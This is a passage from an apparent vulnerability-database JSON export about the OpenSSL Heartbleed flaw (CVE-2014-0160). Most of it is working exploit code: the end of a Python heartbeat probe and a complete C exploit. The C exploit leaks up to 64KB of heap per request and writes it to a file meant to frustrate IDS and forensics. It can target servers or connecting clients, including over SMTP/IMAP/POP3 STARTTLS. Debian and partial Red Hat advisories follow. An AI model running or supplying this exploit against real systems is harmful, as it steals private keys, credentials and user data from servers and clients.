+ timeout\n\trdata = ''\n\tremain = length\n\twhile remain > 0:\n\t\trtime = endtime - time.time()\n\t\tif rtime < 0:\n\t\t\treturn None\n\t\tr, w, e = select.select([s], [], [], 5)\n\t\tif s in r:\n\t\t\tdata = s.recv(remain)\n\t\t\t# EOF?\n\t\t\tif not data:\n\t\t\t\treturn None\n\t\t\trdata += data\n\t\t\tremain -= len(data)\n\treturn rdata\n\n\ndef recvmsg(s):\n\thdr = recvall(s, 5)\n\tif hdr is None:\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\n\t\treturn None, None, None\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\n\tpay = recvall(s, ln, 10)\n\tif pay is None:\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\n\t\treturn None, None, None\n\tprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n\treturn typ, ver, pay\n\ndef hit_hb(s,hb):\n\ts.send(hb)\n\twhile True:\n\t\ttyp, ver, pay = recvmsg(s)\n\t\tif typ is None:\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\n\t\t\treturn False\n\n\t\tif typ == 24:\n\t\t\tprint 'Received heartbeat response:'\n\t\t\thexdump(pay)\n\t\t\tif len(pay) > 3:\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\n\t\t\telse:\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\n\t\t\treturn True\n\n\t\tif typ == 21:\n\t\t\tprint 'Received alert:'\n\t\t\thexdump(pay)\n\t\t\tprint 'Server returned error, likely not vulnerable'\n\t\t\treturn False\n\ndef main():\n\topts, args = options.parse_args()\n\tif len(args) < 1:\n\t\toptions.print_help()\n\t\treturn\n\tfor i in range(len(version)):\n\t\tprint 'Trying ' + version[i][0] + '...'\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tprint 'Connecting...'\n\t\tsys.stdout.flush()\n\t\ts.connect((args[0], opts.port))\n\t\tprint 'Sending Client Hello...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hello(version[i][1]))\n\t\tprint 'Waiting for Server Hello...'\n\t\tsys.stdout.flush()\n\t\twhile True:\n\t\t\ttyp, ver, pay = recvmsg(s)\n\t\t\tif typ == None:\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\n\t\t\t\treturn\n\t\t\t# Look for server hello done message.\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\n\t\t\t\tbreak\n\n\t\tprint 'Sending heartbeat request...'\n\t\tsys.stdout.flush()\n\t\ts.send(create_hb(version[i][1]))\n\t\tif hit_hb(s,create_hb(version[i][1])):\n\t\t\t#Stop if vulnerable\n\t\t\tbreak\n\nif __name__ == '__main__':\n\tmain()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "edition": 1, "published": "2014-04-10T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F", "href": "", "sourceData": "/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\n* =========================================================\n* This exploit uses OpenSSL to create an encrypted connection\n* and trigger the heartbleed leak. The leaked information is\n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\n* This exploit leaks upto 65535 bytes of remote heap each request\n* and can be run in a loop until the connected peer ends connection.\n* The data leaked contains 16 bytes of random padding at the end.\n* The exploit can be used against a connecting client or server,\n* it can also send pre_cmd's to plain-text services to establish\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\n* will often forcefully close the connection during large leak\n* requests so try to lower your payload request size. \n*\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n*\n* E.g.\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ connecting to 192.168.11.23 443/tcp\n* [ connected to 192.168.11.23 443/tcp\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ heartbleed leaked length=65535\n* [ final record type=24, length=16384\n* [ wrote 16381 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=42\n* [ decrypting SSL packet\n* [ final record type=24, length=18\n* [ wrote 18 bytes of heap to file 'out'\n* [ done.\n* $ ls -al out\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\n* $ hexdump -C out\n* - snip - snip \n*\n* Use following example command to generate certificates for clients.\n*\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n* -keyout server.key -out server.crt\n*\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n*\n* todo: add udp/dtls support.\n*\n* - Hacker Fantastic\n* http://www.mdsec.co.uk\n*\n*/\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <signal.h>\n#include <netdb.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <inttypes.h>\n#include <openssl/bio.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <openssl/evp.h>\n#include <openssl/tls1.h>\n#include <openssl/rand.h>\n#include <openssl/buffer.h>\n\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\n\t\t(((unsigned int)(c[1])) )),c+=2)\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\n\nint first = 0;\nint leakbytes = 0;\nint repeat = 1;\nint badpackets = 0;\n\ntypedef struct {\n\tint socket;\n\tSSL *sslHandle;\n\tSSL_CTX *sslContext;\n} connection;\n\ntypedef struct {\n unsigned char type;\n short version;\n unsigned int length;\n unsigned char hbtype;\n unsigned int payload_length;\n void* payload;\n} heartbeat;\n\nvoid ssl_init();\nvoid usage();\nint tcp_connect(char*,int);\nint tcp_bind(char*, int);\nconnection* tls_connect(int);\nconnection* tls_bind(int);\nint pre_cmd(int,int,int);\nvoid* heartbleed(connection* ,unsigned int);\nvoid* sneakyleaky(connection* ,char*, int);\n\nint tcp_connect(char* server,int port){\n\tint sd,ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n host = gethostbyname(server);\n sd = socket(AF_INET, SOCK_STREAM, 0);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n bzero(&(sa.sin_zero),8);\n\tprintf(\"[ connecting to %s %d/tcp\\n\",server,port);\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\n\tif(ret==0){\n\t\tprintf(\"[ connected to %s %d/tcp\\n\",server,port);\n\t}\n\telse{\n\t\tprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\n\t\texit(0);\n\t}\n\treturn sd;\n}\n\nint tcp_bind(char* server, int port){\n\tint sd, ret, val=1;\n\tstruct sockaddr_in sin;\n\tstruct hostent *host;\n\thost = gethostbyname(server);\n\tsd=socket(AF_INET,SOCK_STREAM,0);\n\tif(sd==-1){\n \t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tmemset(&sin,0,sizeof(sin));\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\n\tsin.sin_family=AF_INET;\n\tsin.sin_port=htons(port);\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\n\tif(ret==-1){\n\t\tprintf(\"[!] cannot bind socket\\n\");\n\t\texit(0);\n\t}\n\tlisten(sd,5);\n\treturn(sd);\n}\n\n\nvoid ssl_init(){\n SSL_load_error_strings();\n SSL_library_init();\n OpenSSL_add_all_digests();\n OpenSSL_add_all_algorithms();\n OpenSSL_add_all_ciphers();\n}\n\nconnection* tls_connect(int sd){\n connection *c;\n\tc = malloc(sizeof(connection));\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n c->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n if(SSL_connect(c->sslHandle)!=1)\n ERR_print_errors_fp(stderr);\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n\treturn c;\n}\n\nconnection* tls_bind(int sd){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\n\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nint pre_cmd(int sd,int precmd,int verbose){\n\t/* this function can be used to send commands to a plain-text\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\n\tint rc, go = 0;\n\tchar* buffer;\n\tchar* line1;\n\tchar* line2; \n\tswitch(precmd){\n\t\tcase 0:\n\t\t\tline1 = \"EHLO test\\n\";\n\t\t\tline2 = \"STARTTLS\\n\";\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tline1 = \"CAPA\\n\";\n\t\t\tline2 = \"STLS\\n\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tline1 = \"a001 CAPB\\n\";\n\t\t\tline2 = \"a002 STARTTLS\\n\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tgo = 1;\n\t\t\tbreak;\n\t}\n\tif(go==0){\n\t\tbuffer = malloc(2049);\n\t if(buffer==NULL){\n \tprintf(\"[ error in malloc()\\n\");\n \texit(0);\n\t }\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tprintf(\"[ banner: %s\",buffer);\n\t\tsend(sd,line1,strlen(line1),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t\tsend(sd,line2,strlen(line2),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t}\n\treturn sd;\n}\n\nvoid* heartbleed(connection *c,unsigned int type){\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\ts2n(0xffff,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\n OPENSSL_free(buf);\n\treturn c;\n}\n\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned mac_size, orig_len;\n size_t extra;\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\n extra=SSL3_RT_MAX_EXTRA;\n else\n extra=0;\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n tls1_enc(s,0);\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\nvoid usage(){\n\tprintf(\"[\\n\");\n\tprintf(\"[ --server|-s <ip/dns> - the server to target\\n\");\n\tprintf(\"[ --port|-p <port> - the port to target\\n\");\n\tprintf(\"[ --file|-f <filename> - file to write data to\\n\");\n\tprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\n\tprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\n\tprintf(\"[\t\t\t 0 = SMTP\\n\");\n\tprintf(\"[\t\t\t 1 = POP3\\n\");\n\tprintf(\"[\t\t\t 2 = IMAP\\n\");\n\tprintf(\"[ --loop|-l\t\t - loop the exploit attempts\\n\");\n\tprintf(\"[ --type|-t <n> - select exploit to try\\n\");\n\tprintf(\"[ 0 = null length\\n\");\n\tprintf(\"[\t\t\t 1 = max leak\\n\");\n\tprintf(\"[\t\t\t n = heartbeat payload_length\\n\");\n\tprintf(\"[\\n\");\n\tprintf(\"[ --verbose|-v - output leak to screen\\n\");\n\tprintf(\"[ --help|-h - this output\\n\");\n\tprintf(\"[\\n\");\n\texit(0);\n}\n\nint main(int argc, char* argv[]){\n\tint ret, port, userc, index;\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\n\tint loop = 0;\n\tstruct hostent *h;\n\tconnection* c;\n\tchar *host, *file;\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\n\tprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\n\tprintf(\"[ =============================================================\\n\");\n static struct option options[] = {\n \t{\"server\", 1, 0, 's'},\n\t {\"port\", 1, 0, 'p'},\n\t\t{\"file\", 1, 0, 'f'},\n\t\t{\"type\", 1, 0, 't'},\n\t\t{\"bind\", 1, 0, 'b'},\n\t\t{\"verbose\", 0, 0, 'v'},\n\t\t{\"precmd\", 1, 0, 'c'},\n\t\t{\"loop\", 0, 0, 'l'},\n\t\t{\"help\", 0, 0,'h'}\n };\n\twhile(userc != -1) {\n\t userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvh\",options,&index);\t\n \tswitch(userc) {\n \t\tcase -1:\n\t break;\n \t case 's':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\n\t\t\t\t\tif(h==NULL){\n\t\t\t\t\t\tprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\n\t\t\t\t\t\texit(1);\n\t\t\t\t\t}\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(host==NULL){\n \t\t\t\tprintf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n \t\t\t}\n\t\t\t\tbreak;\n\t case 'p':\n\t\t\t\tif(iport==0){\n\t\t\t\t\tport = atoi(optarg);\n\t\t\t\t\tiport = 1;\n\t\t\t\t}\n \t break;\n\t\t\tcase 'f':\n\t\t\t\tif(ifile==0){\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(file==NULL){\n\t\t\t\t printf(\"[ error in malloc()\\n\");\n \t\t\t\texit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(file,\"%s\",optarg);\n\t\t\t\t\tifile = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 't':\n\t\t\t\tif(itype==0){\n\t\t\t\t\ttype = atoi(optarg);\n\t\t\t\t\titype = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'h':\n\t\t\t\tusage();\n\t\t\t\tbreak;\n\t\t\tcase 'b':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\n\t\t\t\t\tif(host==NULL){\n\t\t\t \t printf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n\t\t\t\t }\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n\t\t\t\t\tbind = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'c':\n\t\t\t\tif(iprecmd == 0){\n\t\t\t\t\tiprecmd = 1;\n\t\t\t\t\tprecmd = atoi(optarg);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'v':\n\t\t\t\tverbose = 1;\n\t\t\t\tbreak;\n\t\t\tcase 'l':\n\t\t\t\tloop = 1;\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\tbreak;\n\t\t}\n\t}\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\n\t\tprintf(\"[ try --help\\n\");\n\t\texit(0);\n\t}\n\tssl_init();\n\tif(bind==0){\n\t\tret = tcp_connect(host, port);\n\t\tpre_cmd(ret, precmd, verbose);\n\t\tc = tls_connect(ret);\n\t\theartbleed(c,type);\n\t\twhile(repeat==1){\n\t\t\tsneakyleaky(c,file,verbose);\n\t\t}\n\t\twhile(loop==1){\n\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\tfirst=0;\n\t\t\trepeat=1;\n\t\t\theartbleed(c,type);\n\t\t\twhile(repeat==1){\n\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t}\n\t\tprintf(\"[ done.\\n\");\n\t\texit(0);\n\t}\n\telse{\n\t\tint sd, pid, i;\n\t\tret = tcp_bind(host, port);\n\t\twhile(1){\n \t\t\tsd=accept(ret,0,0);\n\t\t\tif(sd==-1){\n\t\t\t\tprintf(\"[!] FATAL: problem with accept()\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t\tif(pid=fork()){\n\t\t\t\tclose(sd);\n\t\t\t}\n \t\t\telse{\n\t\t\t\tc = tls_bind(sd);\n\t\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\t\theartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t\twhile(loop==1){\n\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\tfirst=0;\n\t\t\t\t\trepeat=0;\n\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tprintf(\"[ done.\\n\");\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\t}\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:52:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2896-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nApril 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssl\nCVE ID : CVE-2014-0160\nDebian Bug : 743883\n\nA vulnerability has been discovered in OpenSSL's support for the\nTLS/DTLS Hearbeat extension. Up to 64KB of memory from either client or\nserver can be recovered by an attacker This vulnerability might allow an\nattacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2014-04-07T21:37:07", "published": "2014-04-07T21:37:07", "id": "DEBIAN:DSA-2896-1:7AEC1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00071.html", "title": "[SECURITY] [DSA 2896-1] openssl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected 